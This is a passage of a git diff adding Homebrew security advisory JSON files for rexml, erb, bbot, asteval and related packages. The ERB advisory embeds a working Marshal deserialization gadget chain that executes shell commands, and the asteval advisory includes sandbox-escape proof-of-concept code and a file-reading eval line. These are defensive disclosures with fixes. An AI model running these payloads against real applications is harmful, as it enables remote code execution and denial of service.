vulnerability. If you use other parser APIs such as stream parser API and SAX2 parser API, this vulnerability is not affected.\n\n### Patches\n\nThe REXML gem 3.3.6 or later include the patch to fix the vulnerability.\n\n### Workarounds\n\nDon't parse untrusted XMLs with tree parser API.\n\n### References\n\n* https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398/ : An announce on www.ruby-lang.org", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-vmwr-mc7x-5vc3" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43398" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/7cb5eaeb221c322b9912f724183294d8ce96bae3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/releases/tag/v3.3.6" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-43398.yml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20250103-0006" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2024-49761.json b/advisories/BREW-bashly-CVE-2024-49761.json new file mode 100644 index 00000000000..af6a3d9a85f --- /dev/null +++ b/advisories/BREW-bashly-CVE-2024-49761.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2024-49761", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-2rxp-v6pw-ch6m", + "CVE-2024-49761", + "CVE-2025-10990" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.3.9", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML ReDoS vulnerability", + "details": "### Impact\n\nThe REXML gem before 3.3.9 has a ReDoS vulnerability when it parses an XML that has many digits between `&#` and `x...;` in a hex numeric character reference (`&#x...;`).\n\nThis does not happen with Ruby 3.2 or later. Ruby 3.1 is the only affected maintained Ruby. Note that Ruby 3.1 will reach EOL on 2025-03.\n\n### Patches\n\nThe REXML gem 3.3.9 or later include the patch to fix the vulnerability.\n\n### Workarounds\n\nUse Ruby 3.2 or later instead of Ruby 3.1.\n\n### References\n\n* https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761/: An announce on www.ruby-lang.org", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-2rxp-v6pw-ch6m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49761" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/ce59f2eb1aeb371fe1643414f06618dbe031979f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-49761.yml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20241227-0004" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2025-58767.json b/advisories/BREW-bashly-CVE-2025-58767.json new file mode 100644 index 00000000000..cd356f81f79 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2025-58767.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2025-58767", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-c2f4-jgmc-q2r5", + "CVE-2025-58767" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.4.2", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML has DoS condition when parsing malformed XML file", + "details": "### Impact\n\nThe REXML gems from 3.3.3 to 3.4.1 have a DoS vulnerability when parsing XML containing multiple XML declarations.\nIf you need to parse untrusted XMLs, you may be impacted to these vulnerabilities.\n\n### Patches\n\nREXML gems 3.4.2 or later include the patches to fix these vulnerabilities.\n\n### Workarounds\n\nDon't parse untrusted XMLs.\n\n### References\n\n* https://www.ruby-lang.org/en/news/2025/09/18/dos-rexml-cve-2025-58767/ : An announcement on www.ruby-lang.org", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-c2f4-jgmc-q2r5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58767" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/5859bdeac792687eaf93d8e8f0b7e3c1e2ed5c23" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2025-58767.yml" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2025/09/18/dos-rexml-cve-2025-58767" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2026-41316.json b/advisories/BREW-bashly-CVE-2026-41316.json new file mode 100644 index 00000000000..c17d4cce182 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2026-41316.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2026-41316", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-q339-8rmv-2mhv", + "CVE-2026-41316" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "6.0.4", + "resource": "erb", + "resource_purl": "pkg:gem/erb@6.0.7" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "erb", + "subject_version": "6.0.7", + "key": "pkg:gem/erb@6.0.7", + "resource": "erb" + } + ] + }, + "summary": "ERB has an @_init deserialization guard bypass via def_module / def_method / def_class", + "details": "## Summary\n\nRuby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard:\n\n- `ERB#def_method`\n- `ERB#def_module`\n- `ERB#def_class`\n\nAn attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely.\n\n
\n\n## The @_init Guard\n\nIn `ERB#initialize`, the guard is set:\n\n```ruby\n# erb.rb line 838\n@_init = self.class.singleton_class\n```\n\nIn `ERB#result` and `ERB#run`, the guard is checked before `eval(@src)`:\n\n```ruby\n# erb.rb line 1008-1012\ndef result(b=new_toplevel)\n unless @_init.equal?(self.class.singleton_class)\n raise ArgumentError, \"not initialized\"\n end\n eval(@src, b, (@filename || '(erb)'), @lineno)\nend\n```\n\nWhen an ERB object is reconstructed via `Marshal.load`, `@_init` is either `nil` (not set during marshal reconstruction) or an attacker-controlled value. Since `ERB.singleton_class` cannot be marshaled, the attacker cannot set `@_init` to the correct value, and `result`/`run` correctly refuse to execute.\n\n## The Bypass\n\n`ERB#def_method`, `ERB#def_module`, and `ERB#def_class` all reach `eval(@src)` without checking `@_init`:\n\n```ruby\n# erb.rb line 1088-1093\ndef def_method(mod, methodname, fname='(ERB)')\n src = self.src.sub(/^(?!#|$)/) {\"def #{methodname}\\n\"} << \"\\nend\\n\"\n mod.module_eval do\n eval(src, binding, fname, -1) # <-- no @_init check\n end\nend\n\n# erb.rb line 1113-1117\ndef def_module(methodname='erb') # <-- zero-arg call possible\n mod = Module.new\n def_method(mod, methodname, @filename || '(ERB)')\n mod\nend\n\n# erb.rb line 1170-1174\ndef def_class(superklass=Object, methodname='result') # <-- zero-arg call possible\n cls = Class.new(superklass)\n def_method(cls, methodname, @filename || '(ERB)')\n cls\nend\n```\n\n`def_module` and `def_class` accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.\n\n### Method wrapper breakout\n\n`def_method` wraps `@src` in a method definition: `\"def erb\\n\" + @src + \"\\nend\\n\"`. Code inside a method body only executes when the method is called, not when it's defined. However, by setting `@src` to begin with `end\\n`, the attacker closes the method definition early. Code after the first `end` executes immediately at `module_eval` time:\n\n```ruby\n# Attacker sets @src = \"end\\nsystem('id')\\ndef x\"\n# After def_method transformation, module_eval receives:\n#\n# def erb\n# end\n# system('id') <- executes at eval time\n# def x\n# end\n```\n\n---\n\n## Proof of Concept\n\n### Minimal (ERB only)\n\n```ruby\nrequire 'erb'\n\nerb = ERB.allocate\nerb.instance_variable_set(:@src, \"end\\nsystem('id')\\ndef x\")\nerb.instance_variable_set(:@lineno, 0)\n\n# ERB#result correctly blocks this:\nbegin\n erb.result\nrescue ArgumentError => e\n puts \"result: #{e.message} (blocked by @_init -- correct)\"\nend\n\n# ERB#def_module does NOT block this -- executes system('id'):\nerb.def_module\n# Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n### Marshal deserialization (ERB + ActiveSupport)\n\nWhen combined with `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy` as a method dispatch gadget, this achieves RCE via `Marshal.load`:\n\n```ruby\nrequire 'active_support'\nrequire 'active_support/deprecation'\nrequire 'active_support/deprecation/proxy_wrappers'\nrequire 'erb'\n\n# --- Build payload (replace proxy class for marshaling) ---\nreal_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\nActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)\nclass ActiveSupport::Deprecation\n class DeprecatedInstanceVariableProxy\n def initialize(h)\n h.each { |k, v| instance_variable_set(k, v) }\n end\n end\nend\n\nerb = ERB.allocate\nerb.instance_variable_set(:@src, \"end\\nsystem('id')\\ndef x\")\nerb.instance_variable_set(:@lineno, 0)\nerb.instance_variable_set(:@filename, nil)\n\nproxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({\n :@instance => erb,\n :@method => :def_module,\n :@var => \"@x\",\n :@deprecator => Kernel\n})\n\nmarshaled = Marshal.dump({proxy => 0})\n\n# --- Restore real class and trigger ---\nActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)\nActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)\n\n# This triggers RCE:\nMarshal.load(marshaled)\n# Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n**Chain:**\n1. `Marshal.load` reconstructs a Hash with a `DeprecatedInstanceVariableProxy` as key\n2. Hash key insertion calls `.hash` on the proxy\n3. `.hash` is undefined -> `method_missing(:hash)` -> dispatches to `ERB#def_module`\n4. `def_module` -> `def_method` -> `module_eval(eval(src))` -> breakout -> `system('id')`\n\n**Verified on:** Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1\n\n\n
\n\n## Impact\n### Scope\n\nAny Ruby application that calls `Marshal.load` on untrusted data AND has both `erb` and `activesupport` loaded is vulnerable to arbitrary code execution. This includes:\n\n- **Ruby on Rails applications that import untrusted serialized data** -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC\n- **Ruby tools that import untrusted serialized data** -- any tool using `Marshal.load` for caching, data import, or IPC\n- **Legacy Rails apps** (pre-7.0) that still use Marshal for cookie session serialization\n\n### Severity justification\n\nThe `@_init` guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The `def_module` bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.\n\nThis bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.\n\n
\n\n### Gadget chain history\n\nSix generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:\n\n| Year | Chain | Mitigated in |\n|------|-------|-------------|\n| 2018 | Gem::Requirement (Luke Jahnke) | RubyGems 3.0 |\n| 2021 | UDG -- TarReader+WriteAdapter (vakzz) | RubyGems 3.1 |\n| 2022 | Gem::Specification._load (vakzz) | RubyGems 3.6 |\n| 2024 | UncaughtThrowError (Luke Jahnke) | Ruby 3.4 patches |\n| 2024 | Gem::Source::Git#rev_parse | RubyGems 3.6 |\n| **2026** | **ERB#def_module @_init bypass** | **ERB 6.0.4** |\n\n
\n\n## Patches\n\nThe problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.\n\n* ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4\n\n
\n\nAdd the `@_init` check to `def_method`. Since `def_module` and `def_class` both delegate to `def_method`, this single change covers all three bypass paths:\n\n```ruby\ndef def_method(mod, methodname, fname='(ERB)')\n unless @_init.equal?(self.class.singleton_class)\n raise ArgumentError, \"not initialized\"\n end\n src = self.src.sub(/^(?!#|$)/) {\"def #{methodname}\\n\"} << \"\\nend\\n\"\n mod.module_eval do\n eval(src, binding, fname, -1)\n end\nend\n```\n\n
\n\n-----", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/erb" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/erb/CVE-2026-41316.yml" + } + ] +} diff --git a/advisories/BREW-bbot-CVE-2026-14966.json b/advisories/BREW-bbot-CVE-2026-14966.json new file mode 100644 index 00000000000..a06ccc0592e --- /dev/null +++ b/advisories/BREW-bbot-CVE-2026-14966.json @@ -0,0 +1,71 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bbot-CVE-2026-14966", + "published": "2026-08-22T08:40:23Z", + "modified": "2026-08-22T08:40:23Z", + "upstream": [ + "CVE-2026-14966", + "PYSEC-2026-3719" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bbot", + "purl": "pkg:brew/bbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "git", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "git", + "ecosystem": "GIT", + "name": "https://github.com/blacklanternsecurity/bbot", + "subject_version": "3.0.1", + "key": "https://github.com/blacklanternsecurity/bbot" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "bbot", + "subject_version": "3.0.1", + "key": "pkg:pypi/bbot@3.0.1" + } + ] + }, + "details": "BBOT's unarchive module rejects archives containing symlink entries before extraction, but for zip and 7z archives it failed to detect symlinks whose listing carries a DOS-attribute prefix before the unix mode, as produced by legacy versions of p7zip. Such an archive, downloaded and extracted during a scan (for example via filedownload), bypassed the guard and caused an attacker-controlled symlink to be written into the extraction directory. The effect is limited to planting the symlink (its target is not written through), and only hosts using such a legacy p7zip build are affected; current mainline 7-Zip is not.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "FIX", + "url": "https://github.com/blacklanternsecurity/bbot/commit/a3f1a2292e2b0a553827c6175b761abe28807735" + } + ] +} diff --git a/advisories/BREW-bbot-CVE-2026-14967.json b/advisories/BREW-bbot-CVE-2026-14967.json new file mode 100644 index 00000000000..2fff8fc318a --- /dev/null +++ b/advisories/BREW-bbot-CVE-2026-14967.json @@ -0,0 +1,71 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bbot-CVE-2026-14967", + "published": "2026-08-22T08:40:23Z", + "modified": "2026-08-22T08:40:23Z", + "upstream": [ + "CVE-2026-14967", + "PYSEC-2026-3720" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bbot", + "purl": "pkg:brew/bbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "git", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "git", + "ecosystem": "GIT", + "name": "https://github.com/blacklanternsecurity/bbot", + "subject_version": "3.0.1", + "key": "https://github.com/blacklanternsecurity/bbot" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "bbot", + "subject_version": "3.0.1", + "key": "pkg:pypi/bbot@3.0.1" + } + ] + }, + "details": "BBOT's `github_workflows` module could be induced to write a downloaded artifact outside its configured output directory: its path-containment check did not resolve `..`, so a crafted `CODE_REPOSITORY` URL could traverse out of the intended folder. The write is bounded to two directory levels above the output location and its target is determined by the operator's configuration, not the attacker.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "FIX", + "url": "https://github.com/blacklanternsecurity/bbot/commit/c1c6ec05ff998e2fba55a14d1026f12563ccd82f" + } + ] +} diff --git a/advisories/BREW-charmcraft-CVE-2026-59939.json b/advisories/BREW-charmcraft-CVE-2026-59939.json index 88ab0e1e853..cab55ee3786 100644 --- a/advisories/BREW-charmcraft-CVE-2026-59939.json +++ b/advisories/BREW-charmcraft-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-charmcraft-CVE-2026-59939", "published": "2026-08-13T16:39:06Z", - "modified": "2026-08-13T16:39:06Z", + "modified": "2026-08-22T08:42:16Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-checkov-CVE-2026-55244.json b/advisories/BREW-checkov-CVE-2026-55244.json new file mode 100644 index 00000000000..3b59fabf979 --- /dev/null +++ b/advisories/BREW-checkov-CVE-2026-55244.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-checkov-CVE-2026-55244", + "published": "2026-08-22T08:42:43Z", + "modified": "2026-08-22T08:42:43Z", + "upstream": [ + "GHSA-89v8-rhwq-hf77", + "CVE-2026-55244" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "checkov", + "purl": "pkg:brew/checkov" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "ecosystem_specific": { + "fix": null, + "range_state": "affected", + "upstream_fixed_in": "1.0.9", + "resource": "asteval", + "resource_purl": "pkg:pypi/asteval@1.0.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "asteval", + "subject_version": "1.0.6", + "key": "pkg:pypi/asteval@1.0.6", + "resource": "asteval" + } + ] + }, + "summary": "asteval has a Sandbox Escape via BaseException Subclasses", + "details": "## Summary\n\nAn attacker who can supply expressions to `asteval.Interpreter.eval()` can raise `SystemExit`,\n`KeyboardInterrupt`, `GeneratorExit`, or `BaseException` from inside the sandbox. These\nexceptions are subclasses of `BaseException` but not `Exception`, so they bypass the\n`except Exception:` safety net in both `run()` and `eval()`. The exception propagates\nverbatim to the calling application, terminating the process or disrupting signal and\ncleanup handlers.\n\nThis is distinct from prior vulnerabilities CVE-2025-24359 (format string injection) and\nGHSA-vp47-9734-prjw (AST mutation TOCTOU), both fixed in 1.0.6. This vector is present in\nall versions including 1.0.6 and current HEAD.\n\n---\n\n## Affected Code\n\n**`asteval/astutils.py`, lines 89–108** — `FROM_PY` exposes dangerous classes to sandbox users:\n\n```python\nFROM_PY = ('ArithmeticError', 'AssertionError', 'AttributeError',\n 'BaseException', # ← escapes except Exception:\n 'BufferError', 'BytesWarning',\n ...\n 'GeneratorExit', # ← escapes except Exception:\n ...\n 'KeyboardInterrupt', # ← escapes except Exception:\n ...\n 'SystemExit', # ← escapes except Exception:\n ...)\n```\n\n**`asteval/asteval.py`, line 322** — `run()` exception handler:\n\n```python\nexcept Exception: # ← does NOT catch BaseException subclasses\n if with_raise and self.expr is not None:\n self.raise_exception(node, expr=self.expr)\n```\n\n**`asteval/asteval.py`, line 370** — `eval()` exception handler:\n\n```python\nexcept Exception: # ← same gap\n if show_errors and not raise_errors:\n ...\n```\n\n**`asteval/asteval.py`, line 264** — `raise_exception()` raises the class directly:\n\n```python\nraise exc(self.error_msg) # ← when exc=SystemExit, escapes both handlers above\n```\n\n---\n\n## Root Cause\n\nPython's exception hierarchy has two distinct branches under `BaseException`:\n\n```\nBaseException\n├── SystemExit ← NOT caught by except Exception:\n├── KeyboardInterrupt ← NOT caught by except Exception:\n├── GeneratorExit ← NOT caught by except Exception:\n└── Exception ← caught normally\n ├── RuntimeError\n ├── ValueError\n └── ...\n```\n\n`FROM_PY` exposes all four non-`Exception` classes to sandbox users. When a user writes\n`raise SystemExit(\"msg\")`, the `on_raise()` handler calls:\n\n```python\nself.raise_exception(None, exc=out.__class__, msg=msg, expr='')\n```\n\nwhich executes `raise SystemExit(msg)`. This propagates through both `except Exception:`\nguards unchecked and surfaces in the calling application.\n\n---\n\n## Proof of Concept\n\n```python\nfrom asteval import Interpreter\n\n# Variant 1: terminate the process\naeval = Interpreter()\ntry:\n aeval.eval('raise SystemExit(\"terminated by sandbox user\")')\nexcept SystemExit as e:\n print(f\"[CONFIRMED] SystemExit escaped: {e.code!r}\")\n\n# Variant 2: disrupt signal/finally handling\naeval = Interpreter()\ntry:\n aeval.eval('raise KeyboardInterrupt(\"interrupt injected\")')\nexcept KeyboardInterrupt as e:\n print(f\"[CONFIRMED] KeyboardInterrupt escaped: {str(e)!r}\")\n\n# Variant 3: GeneratorExit\naeval = Interpreter()\ntry:\n aeval.eval('raise GeneratorExit(\"gen escape\")')\nexcept GeneratorExit as e:\n print(f\"[CONFIRMED] GeneratorExit escaped: {str(e)!r}\")\n\n# Variant 4: BaseException base class\naeval = Interpreter()\ntry:\n aeval.eval('raise BaseException(\"base escape\")')\nexcept BaseException as e:\n if not isinstance(e, Exception):\n print(f\"[CONFIRMED] BaseException escaped: {str(e)!r}\")\n```\n\n**Output (tested on asteval 1.0.6, Python 3.11/3.12):**\n\n```\n[CONFIRMED] SystemExit escaped: 'terminated by sandbox user'\n[CONFIRMED] KeyboardInterrupt escaped: 'interrupt injected'\n[CONFIRMED] GeneratorExit escaped: 'gen escape'\n[CONFIRMED] BaseException escaped: 'base escape'\n```\n\n### Real-world server scenario\n\n```python\nfrom asteval import Interpreter\n\ndef handle_request(user_expression):\n aeval = Interpreter()\n return aeval.eval(user_expression) # SystemExit propagates here\n\n# Attacker sends: raise SystemExit(1)\n# Application terminates. Top-level except Exception: handlers do not protect it.\ntry:\n handle_request('raise SystemExit(1)')\nexcept Exception:\n pass # <-- does NOT catch SystemExit; process exits\n```\n\n---\n\n## Impact\n\n| Variant | Impact |\n|---------|--------|\n| `SystemExit` | Process terminates; exit code and message attacker-controlled |\n| `KeyboardInterrupt` | Disrupts `finally` blocks, signal handlers, and `KeyboardInterrupt`-aware loops |\n| `GeneratorExit` | Disrupts generator cleanup in calling code |\n| `BaseException` | Generic escape, same propagation |\n\nAny application that:\n- Accepts user-supplied expressions via `asteval`\n- Relies on `except Exception:` at the top level (standard practice)\n- Does not wrap `aeval.eval()` in `except BaseException:` (non-standard, unexpected requirement)\n\n...is vulnerable to attacker-triggered process termination (DoS).\n\nCVSS breakdown: Network-reachable (AV:N), no special conditions (AC:L), no credentials (PR:N),\nno interaction (UI:N), scope unchanged (S:U), no confidentiality/integrity impact (C:N/I:N),\nhigh availability impact — process termination (A:H).\n\n---\n\n## Additional Note: File Read Capability (Acknowledged Limitation)\n\nIndependently of this vulnerability, `asteval` exposes a read-only `open()` wrapper\n(`_open` in `astutils.py`) that allows reading arbitrary files with the permissions of the\ncalling process:\n\n```python\naeval.eval(\"open('/etc/passwd').read()\") # returns /etc/passwd contents\n```\n\nThis is documented in `doc/motivation.rst` as a known design choice (\"If reading from disk\nmust be forbidden, you will want to overwrite the `open()` function from the symbol table\").\nIt is included here for completeness, not as a separate advisory claim.\n\n---\n\n## Recommended Fix\n\n**Option A — Remove dangerous classes from `FROM_PY` (minimal, preferred):**\n\n```python\n# asteval/astutils.py\n\nFROM_PY = ('ArithmeticError', 'AssertionError', 'AttributeError',\n # Remove: 'BaseException',\n 'BufferError', 'BytesWarning',\n 'DeprecationWarning', 'EOFError', 'EnvironmentError',\n 'Exception', 'False', 'FloatingPointError',\n # Remove: 'GeneratorExit',\n 'IOError', 'ImportError', 'ImportWarning', 'IndentationError',\n 'IndexError', 'KeyError',\n # Remove: 'KeyboardInterrupt',\n 'LookupError',\n 'MemoryError', 'NameError', 'None',\n 'NotImplementedError', 'OSError', 'OverflowError',\n 'ReferenceError', 'RuntimeError', 'RuntimeWarning',\n 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError',\n # Remove: 'SystemExit',\n 'True', 'TypeError', ...)\n```\n\n**Option B — Block non-`Exception` raises in `on_raise()`:**\n\n```python\n# asteval/asteval.py\n\ndef on_raise(self, node):\n excnode = node.exc\n msgnode = node.cause\n out = self.run(excnode)\n # Prevent BaseException subclasses from escaping the sandbox\n if not issubclass(out.__class__, Exception):\n self.raise_exception(node, exc=RuntimeError,\n msg=f\"raising {out.__class__.__name__!r} is not permitted\")\n return\n msg = ' '.join(str(a) for a in out.args)\n msg2 = self.run(msgnode)\n if msg2 not in (None, 'None'):\n msg = f\"{msg}: {msg2}\"\n self.raise_exception(None, exc=out.__class__, msg=msg, expr='')\n```\n\nNote: Option B also fixes a secondary bug on the same line — `' '.join(out.args)` crashes\nwith `TypeError` when args contain non-strings (e.g., `raise SystemExit(0)` with integer\ncode). The fix uses `str(a) for a in out.args`.\n\n**Option C — Catch `BaseException` in `run()` and `eval()` (broadest, requires care):**\n\n```python\nexcept BaseException as exc:\n if isinstance(exc, (SystemExit, KeyboardInterrupt, GeneratorExit)):\n # Re-raise as RuntimeError to contain within sandbox\n 